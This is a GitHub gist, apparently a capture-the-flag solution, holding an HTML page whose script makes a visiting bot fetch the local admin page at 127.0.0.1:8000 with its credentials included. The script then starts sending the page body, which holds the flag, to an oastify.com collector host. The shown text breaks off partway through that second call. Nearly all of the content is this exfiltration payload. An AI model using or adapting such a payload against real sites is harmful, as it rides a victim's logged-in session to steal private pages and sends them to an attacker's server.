Mostafa Fathy 0xtefa
0xtefa
/ gist:f2eb65515ab8f45f55d635d4b48229ef
Created
September 19, 2025 08:18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!doctype html> | |
| <html> | |
| <body> | |
| <script> | |
| // Try to fetch the admin page using the bot's credentials | |
| fetch('http://127.0.0.1:8000/admin', { credentials: 'include' }) | |
| .then(r => r.text()) | |
| .then(body => { | |
| // send the admin page body (with flag) to your collector | |
| fetch('r7zexf4d6efw4qc44ld925so3f96xwll.oastify.com', { |